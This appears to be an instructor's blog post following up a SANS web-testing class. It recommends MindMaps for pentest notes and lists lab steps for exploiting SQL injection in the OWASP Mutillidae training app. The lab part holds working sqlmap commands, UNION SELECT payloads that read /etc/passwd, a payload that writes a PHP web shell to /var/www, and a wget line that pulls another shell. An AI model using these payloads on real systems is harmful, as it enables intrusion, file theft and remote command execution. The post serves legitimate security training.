Errata from my SANS SEC542 Class

This post is just a follow-up for things I spoke about during the SANS Rocky Mountain conference held in Denver, CO in June 2014…well…now.

MindMaps for Note-taking

As I mentioned in class, one way that I like to organize information during testing and just when taking notes, is in a MindMap format. There are some gorgeous “infographic-type” MindMaps like the ones on Amanhardikar’s site. I’m not talking about those. I’m talking about the notes I take during a test. Another good example of the power of using MindMap is th3j35t3r’s picture of his exploits.
MindMaps work for me because:
  1. Some good MindMap software is free. I currently use XMind but have also used FreeMind.
  2. They are multi-user so multiple testers can add/edit data in them at the same time.
  3. They allow me to note what I’m working on. Then, inevitably, when I see the testing equivalent of a “squirrel” like possible SQL injection or some other juicy I can easily note it to come back to and continue with my current testing. I usually use some of the MindMap icons (see the screenshots below) to note something I want to come back to (I use a question mark for that), a finding (using an exclamation mark) and other things. Come up with your own system that makes sense for you.
  4. Copying a node will give you an outline of the child nodes. So I can copy from my MindMap and paste into an Office document such as Word or Outlook and the formatting is maintained.
  5. The nodes expand and compress. So, let’s say I’ve been working on exploiting the system http://www.example.com and I’ve made a ton of entries under that system. Now I’ve finished with my testing and I need to move on to the next host (ecommerce.example.com) that is my target. In a normal text file, all of that content I’ve noted stays there in the page. I either need to put the newer stuff before or after it. I’ll still need to scroll through that old content and that’s annoying. With a MindMap, I can just contract the http://www.example.com node and all the notes “under it” collapse into the node. Need to look at those notes? Click the node and it expands. Check out the sample below. 
    Sample MindMap
  6. I can template common testing tactics/processes to ensure that they are done on each assessment. In the template I show sample testing notes for a few systems too.  An extract is below. 
    MindMap Template
I’ve posted a sample/template MindMap on my Google Drive. It is in an XMind format. Feel free to download and modify.

Pwnwiki.io

Instead of reposting a blog entry about this, I’ll point you to http://webbreacher.blogspot.com/2013/10/what-do-you-do-when-you-have-shell.html and http://pwnwiki.io.

SANS @Night Presentation

I presented a SQL Injection Exploitation talk/demo. You can download/view it here http://www.slideshare.net/webbreacher/sans-night-talk-sql-injection-exploited. The main point was to show that SQL injection exploitation was simple and about MUCH more than just stealing hundreds of thousands of database records.
I used a combination of http://www.samurai-wtf.org/ and OWASP’s Mutillidae. The steps for the lab are below.

Sqlmap
In a terminal window, type sqlmap -h
Put into sqlmap (sqlmap -u “http://mutillidae/index.php?page=user-info.php&username=test&password=password&user-info-php-submit-button=View+Account+Details)
Exploit using above sqlmap and the switches below
current-usercurrent-dbhostnameuserspasswords –dbs
Read the first 2 records of all DB tables: dump-all –stop=2
Show the output CSVs in the directories on the Desktop in ToolOutput folder
READ FILE (/etc/passwd): file-read=/etc/passwd
Manually
Enter bad username/password like micah / letmein
Enter this in the username field to get ALL the records with no password: micah’union select * from accounts
Enter this in the username field to read the /etc/passwd file: micah‘ union select null,load_file(‘/etc/passwd‘), null, null,null
Enter this in the username field to upload a basic PHP web shell to the system in /var/www/: micah‘ union select null,null,null,null,'<FORM METHOD="POST" NAME="myform” ACTION=””><INPUT TYPE="text" NAME="cmd“>

<?phpif($_POST["cmd"]) {  system($_POST["cmd"]);  } ?>

‘ INTO DUMPFILE ‘/var/www/cmd.php‘ — 

In a browser in the VM, visit http://localhost/cmd.php
Play around using ls, pwd, id -a, cat /etc/passwd
Launch a Python web server: python -m SimpleHTTPServer
On Samurai
In the cmd.php, type ifconfig
The grab a webshell from the server by typing this into the cmd.php field: wget http:///%5ByourIP]:8000/[webshellname].php

SQL Injection Cheat Sheet Site

Time Waster

One thought on “Errata from my SANS SEC542 Class

Comments are closed.

A WordPress.com Website.

Up ↑

%d bloggers like this: